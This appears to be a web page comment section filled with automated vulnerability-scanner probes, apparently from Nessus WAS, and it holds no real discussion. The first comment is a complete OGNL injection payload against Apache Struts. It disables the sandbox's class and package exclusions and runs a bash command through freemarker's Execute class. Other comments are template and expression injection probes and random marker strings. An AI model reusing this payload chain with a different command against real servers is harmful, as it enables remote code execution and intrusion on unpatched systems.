Views:
Comments (10)
  • %{(#request.map=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + (#request.map2=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) +(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + (#request.map3=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + (#request.get('map3').put('excludedPackageNames',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) + (#request.get('map3').put('excludedClasses',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) +(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo,WAS-$((984*518))}'}))}
  • nessus_was_textjw19y4cy
  • nessus_was_textxnvbbhcs
  • nessus_was_text11zeocda
  • 'tnbwas_WSiw3rN2kkCQ'+7837*9617
  • nessus_was_text292bw53s
  • nessus_was_text8ir1v4cj
  • nessus_was_text5voa3wf2
  • {{'tnbwas_WSiw3rN2kkCQ'+7837*9617}}
  • nessus_was_text8ucj2ul8
Add a comment